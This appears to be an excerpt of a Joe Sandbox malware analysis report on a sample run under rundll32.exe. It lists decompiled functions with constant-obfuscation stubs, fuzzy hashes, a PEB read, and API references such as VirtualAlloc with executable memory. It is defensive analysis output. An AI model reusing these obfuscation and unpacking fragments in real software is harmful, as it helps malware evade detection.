Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
Instruction ID: aa687dd57ce138c5d027db5d40aec5001319b887e1c8c5533025dfc11f4c07d5
Opcode Fuzzy Hash: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
Instruction Fuzzy Hash: 57214872D0020DEBDF05DFE9D80A9DFBBB2EB44704F10809AE514A7250D7B99A54DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0043DE81, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0043DE81(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				signed int _t71;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t61);
				_v8 = 0x815e;
				_v8 = _v8 | 0x0f7b832c;
				_t71 = 0x1f;
				_v8 = _v8 / _t71;
				_v8 = _v8 ^ 0x007fc6d9;
				_v20 = 0x1739;
				_v20 = _v20 | 0x0d3215ff;
				_v20 = _v20 ^ 0x0d32419d;
				_v24 = 0x65f5;
				_v24 = _v24 + 0x3c25;
				_v24 = _v24 ^ 0x0000c547;
				_v16 = 0xa0ce;
				_v16 = _v16 + 0xefa2;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00000fc3;
				_v16 = 0x5b12;
				_v16 = _v16 | 0xa0c0d766;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0xb33b088d;
				_v24 = 0x32c7;
				_v24 = _v24 ^ 0x4853b697;
				_v24 = _v24 ^ 0x4853c8a7;
				_v16 = 0x1aa;
				_v16 = _v16 + 0x7f2c;
				_v16 = _v16 | 0xff30d166;
				_v16 = _v16 ^ 0xff30c9aa;
				_v12 = 0xd947;
				_v12 = _v12 ^ 0x0ebf1cd4;
				_v12 = _v12 + 0xffff3fa5;
				_v12 = _v12 ^ 0x0ebf1307;
				return E00433A9D(__edx, _v24, _v16, _v12, _t71, E00437AA1(_t71));
			}

0x0043de88
0x0043de8d
0x0043de8e
0x0043de8f
0x0043de94
0x0043de9e
0x0043deac
0x0043deaf
0x0043deb2
0x0043deb9
0x0043dec0
0x0043dec7
0x0043dece
0x0043ded5
0x0043dedc
0x0043dee3
0x0043deea
0x0043def1
0x0043def5
0x0043defc
0x0043df03
0x0043df0e
0x0043df11
0x0043df18
0x0043df1f
0x0043df26
0x0043df2d
0x0043df34
0x0043df3b
0x0043df42
0x0043df49
0x0043df50
0x0043df57
0x0043df5e
0x0043df89

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
Instruction ID: 1ce04ba783e8cd00c7af0443bcd6e1d92096256cf023cc5e59e91421f30cba86
Opcode Fuzzy Hash: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
Instruction Fuzzy Hash: B521F375D0130DEBEB48DFA6C90A4AEBFB4EB00318F108099D425B6290D3B84B14DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00441DFE, Relevance: .0, Instructions: 47
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00441DFE(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;

				_v32 = _v32 & 0x00000000;
				_v12 = 0xa959;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x0d27cc61;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xcec4698e;
				_v8 = 0x266;
				_v8 = _v8 | 0x1b157375;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0x60c31c80;
				_v8 = _v8 ^ 0x60cfecf0;
				_v20 = 0xddd8;
				_v20 = _v20 | 0xb972bece;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x20fc7b64;
				_v20 = _v20 ^ 0xc537d2af;
				_v28 = 0x5083;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x05080fa9;
				_v24 = 0xe86a;
				_v24 = _v24 >> 5;
				_v24 = _v24 + 0xc90c;
				_v24 = _v24 ^ 0x00009a6e;
				_v16 = 0x5939;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xfb70;
				_v16 = _v16 + 0xffff7911;
				_v16 = _v16 ^ 0x000120b2;
				E00446A9A(_v20, _v28, _v24, _v16, E00441999(),  &_v32);
				return _v32;
			}

0x00441e04
0x00441e08
0x00441e0f
0x00441e13
0x00441e1a
0x00441e1e
0x00441e25
0x00441e2c
0x00441e33
0x00441e37
0x00441e3e
0x00441e45
0x00441e4c
0x00441e53
0x00441e57
0x00441e5e
0x00441e65
0x00441e6c
0x00441e70
0x00441e77
0x00441e7e
0x00441e82
0x00441e89
0x00441e90
0x00441e97
0x00441e9a
0x00441ea1
0x00441ea8
0x00441ecb
0x00441ed9

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction ID: e24b1b9f1cddd56d32a355bef64174de39b53ec5ae6d9203dc022444aa61a105
Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction Fuzzy Hash: 7221BD75D0020EEFDB59EFE5C94A5AEFBB0BB10708F208588D42272251D3B90B49DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00181372, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction ID: fe94595547cc1608236a15aa3407680f053258ec82139db9df85a6504b4b8d34
Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction Fuzzy Hash: 3121BD75D0020EEFDB59EFE4C94A5AEFBB0BB50708F208588D422B2251D3B90B59DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00444F04, Relevance: .0, Instructions: 45
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00444F04(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x77d1f3;
				_v32 = 0x102c4a;
				_v28 = 0x31c61e;
				_v12 = 0xccec;
				_v12 = _v12 >> 5;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 | 0xecb7e12e;
				_v12 = _v12 ^ 0xecb7f166;
				_v8 = 0x1581;
				_v8 = _v8 | 0xff7deff7;
				_v8 = _v8 ^ 0xd17bf610;
				_v8 = _v8 ^ 0x2e060f97;
				_v16 = 0x4eb3;
				_v16 = _v16 + 0xfffffcad;
				_v16 = _v16 ^ 0xeadf5fa4;
				_v16 = _v16 ^ 0xeadf108b;
				_v20 = 0x2120;
				_v20 = _v20 ^ 0xb07dd198;
				_t53 = 0x4f;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x023bed5f;
				return 0 | E0044C631(_v12, _a4,  *((intOrPtr*)( *0x451090 + 0x1c)), _v8, _v16) != _v20;
			}

0x00444f0a
0x00444f10
0x00444f17
0x00444f1e
0x00444f25
0x00444f2c
0x00444f30
0x00444f34
0x00444f3b
0x00444f42
0x00444f49
0x00444f50
0x00444f57
0x00444f5e
0x00444f65
0x00444f6c
0x00444f73
0x00444f7a
0x00444f81
0x00444f8d
0x00444f93
0x00444f96
0x00444fc5

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10447195345e0ee18fe468aee229390d6d2a647ee50576cfcecd2b30e07ef040
Instruction ID: 1e30c03a215ec22c2183f5d32dc58ed975ab25b7a62956acdd0d11640120a754
Opcode Fuzzy Hash: 10447195345e0ee18fe468aee229390d6d2a647ee50576cfcecd2b30e07ef040
Instruction Fuzzy Hash: DD111274D0020DEBDB08CFA5D98A5EEBBB1FF44304F108698D925AA2A0C7B80B55CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00184478, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
Instruction ID: 33e71089e2d7e6fbadfbe1d052e6b597d27b9f5c5198ab76717bbdd445c33a09
Opcode Fuzzy Hash: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
Instruction Fuzzy Hash: 3811E274D4020DEBDB08CFA5D98A9EEBBB1FF54314F108698D525AA2A4C7B81B55CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00433278, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433278() {

				return  *[fs:0x30];
			}

0x0043327e

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001727EC, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00458330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00458361
GetSystemMetrics.USER32(00000000), ref: 0045839D
GetSystemMetrics.USER32(00000001), ref: 004583A8

Strings

DISPLAY, xrefs: 004583C9
GetMonitorInfo, xrefs: 00458348
/}Au, xrefs: 0045839D, 004583A8

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: dc8af7b7719741278f1d012255af06c22b7eed1e9761371c74353c0a476c18f4
Instruction ID: 95e4d7fd54233c9142fc6d1db9f69e9c90b92c099ca75e0c8cbfc7fb56c54e9c
Opcode Fuzzy Hash: dc8af7b7719741278f1d012255af06c22b7eed1e9761371c74353c0a476c18f4
Instruction Fuzzy Hash: 3011DF71602305AFD3208F219C447A7B7E8EB15B52F01453FED46E7242EFB5A8088BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004585AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004585E5
GetSystemMetrics.USER32(00000000), ref: 0045860A
GetSystemMetrics.USER32(00000001), ref: 00458615

Strings

EnumDisplayMonitors, xrefs: 004585C4
/}Au, xrefs: 0045860A, 00458615

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 86151294856f6d99942bf633995a7e143d641c32075830bf3584c5cc332491c9
Instruction ID: 46a68b7d6f6f6dc68f29aabfda712113159420c357fdba034376b28a787bd3ca
Opcode Fuzzy Hash: 86151294856f6d99942bf633995a7e143d641c32075830bf3584c5cc332491c9
Instruction Fuzzy Hash: 56310DB2901209AFDB10DFA5CC449EF77BCAB59306F01452BED15E3201EF3899058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00458404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00458471
GetSystemMetrics.USER32(00000001), ref: 0045847C

Strings

DISPLAY, xrefs: 0045849D
/}Au, xrefs: 00458471, 0045847C
GetMonitorInfoA, xrefs: 0045841C

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 78b8eb7ac2357693440253a51fbcf20f3f3ae68c8b0e6d43f2e70812e38305f9
Instruction ID: 6a21d9391e0153a6e528c1371d1a68bf042ab8217e1ae754496ad6fe5725c233
Opcode Fuzzy Hash: 78b8eb7ac2357693440253a51fbcf20f3f3ae68c8b0e6d43f2e70812e38305f9
Instruction Fuzzy Hash: 651136716023029FD720CF219C447A7B7E9EB06321F01443FED45AB241EF74A8488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004584D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00458545
GetSystemMetrics.USER32(00000001), ref: 00458550

Strings

DISPLAY, xrefs: 00458571
/}Au, xrefs: 00458545, 00458550
GetMonitorInfoW, xrefs: 004584F0

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: b2b60380bb114c5adafcb90a234bbfeb8dcbe648fc8262476cfe05006e717ca5
Instruction ID: e11581e922413ee83e2d501894657468aebceb3d73bdeb36d8e38cabccefb8c1
Opcode Fuzzy Hash: b2b60380bb114c5adafcb90a234bbfeb8dcbe648fc8262476cfe05006e717ca5
Instruction Fuzzy Hash: 5611E171A41309AFD720DF618C44BA7B7E8EB15312F15493FED45E7242EF74A8088BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00458298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004582E6
GetSystemMetrics.USER32(00000001), ref: 004582F8

Strings

MonitorFromPoint, xrefs: 004582AA
/}Au, xrefs: 004582E6, 004582F8

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: f0bdf39c9173c8df4f19312fa5e1eda767ba90a825401b17cd3d52d493c31f8d
Instruction ID: 1d3fdbd1d5c21586f27110262bfe9789812ee5f7ec127051d33c97170813215f
Opcode Fuzzy Hash: f0bdf39c9173c8df4f19312fa5e1eda767ba90a825401b17cd3d52d493c31f8d
Instruction Fuzzy Hash: 81014B31201308EBDB009F56DC45B9A7B95EB60B56F45403FFD04AB252CF7AAD498BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00458170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004581C1
GetSystemMetrics.USER32(00000001), ref: 004581CD

Strings

MonitorFromRect, xrefs: 00458185
/}Au, xrefs: 004581C1, 004581CD

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: 1183a0b4a219d724df0d4bad6b8133294175baae793d25a8df50de726b73aecb
Instruction ID: 7f987bcaecf52fccd6b7ebd211955ac4d5373ad93ede91f70b9c7dfcd18c97a8
Opcode Fuzzy Hash: 1183a0b4a219d724df0d4bad6b8133294175baae793d25a8df50de726b73aecb
Instruction Fuzzy Hash: 7D018B71202614ABD710AB15DC89B27B798E750396F05807FEC04EB203CE799C4A8BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00492B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00492B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00492BA9
DdeGetLastError.USER32(00000015), ref: 00492BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00492BCD

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 2b01b266977f89c870a674996b59e99b9f846cac6576aa2422667e8c2908e835
Instruction ID: 2f057967e607f01095f68b691c28a178b247910f579327eed3ab4aeb41e8443b
Opcode Fuzzy Hash: 2b01b266977f89c870a674996b59e99b9f846cac6576aa2422667e8c2908e835
Instruction Fuzzy Hash: F7214A742042409FDB40DF59C9C5F5A7BE8AF49310F1581A6F948CF2A6D779EC40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00491428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004914BF

Strings

`, xrefs: 00491498
0I, xrefs: 00491607

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0I$`
API String ID: 701148680-3417282894
Opcode ID: 5950c3fa3aaae5a988828ed46f9ad688e98d3462acf665efca0a4861f019216d
Instruction ID: fed84ef09666087c161930aaaeb9e5d6fa26d2344e9d8d8523a5e6954fa8b9b5
Opcode Fuzzy Hash: 5950c3fa3aaae5a988828ed46f9ad688e98d3462acf665efca0a4861f019216d
Instruction Fuzzy Hash: 50518176E0021B9B8F10EE59D9858AF7BB5AB88354F164036FD06D7360CA38DD02C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004580E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00458110

Strings

GetSystemMetrics, xrefs: 004580F8
/}Au, xrefs: 004580FD, 0045810A, 00458110

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 8353be7e35f47474dc3907614afafeb27f2ef9b36a58535c37ef25f5b2e3d309
Instruction ID: 6f8926773bb5d339f8172b61a0079cea03ab9ecef204930c38bbf572e046833b
Opcode Fuzzy Hash: 8353be7e35f47474dc3907614afafeb27f2ef9b36a58535c37ef25f5b2e3d309
Instruction Fuzzy Hash: E3F02430102A014ADB109F39CE806233546A752336F618B3FED25662F3EE3C880F838D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3044 Parent PID: 2940 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	0%
Total number of Nodes:	260
Total number of Limit Nodes:	15

Executed Functions

Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E

Strings

|lF, xrefs: 00463961
trty55345, xrefs: 004639BD

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lF
API String ID: 2643768156-462011533
Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F

Uniqueness

Uniqueness Score: -1.00%

Function 004104C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004104C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x004104cd
0x004104d6
0x004104dd
0x004104e1
0x004104e5
0x004104ec
0x004104f8
0x004104fd
0x00410502
0x00410509
0x00410510
0x00410517
0x0041051f
0x00410522
0x00410529
0x00410530
0x00410537
0x00410556
0x00410560

APIs

ExitProcess.KERNEL32(00000000), ref: 00410560

Strings

*S, xrefs: 00410522
LZ, xrefs: 00410529
5l, xrefs: 00410502

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00409B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00409B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00412550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E00407378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}

0x00409b66
0x00409b69
0x00409b6b
0x00409b6e
0x00409b71
0x00409b73
0x00409b78
0x00409b87
0x00409b8c
0x00409b8d
0x00409b90
0x00409b91
0x00409b9d
0x00409b9e
0x00409ba3
0x00409baa
0x00409bb8
0x00409bbd
0x00409bc4
0x00409bcb
0x00409bd5
0x00409bdd
0x00409be0
0x00409be7
0x00409bee
0x00409c05
0x00409c0c
0x00409c0f
0x00409c16
0x00409c29
0x00409c38
0x00409c3f

APIs

RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00409C38

Strings

$%/t, xrefs: 00409BC4

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $%/t
API String ID: 1279760036-1978068534
Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction ID: 291bc368fe39a279b6a73a568581b61c4ea3bd0b76b1db960726e9f41e5a5dee
Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction Fuzzy Hash: C2214671D00209BBEB18CFA9C9469DEBBB5FB44310F108099E814AA2A0D7B9AB109B51

Uniqueness

Uniqueness Score: -1.00%

Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686

Strings

Link, xrefs: 00461666

Memory Dump Source

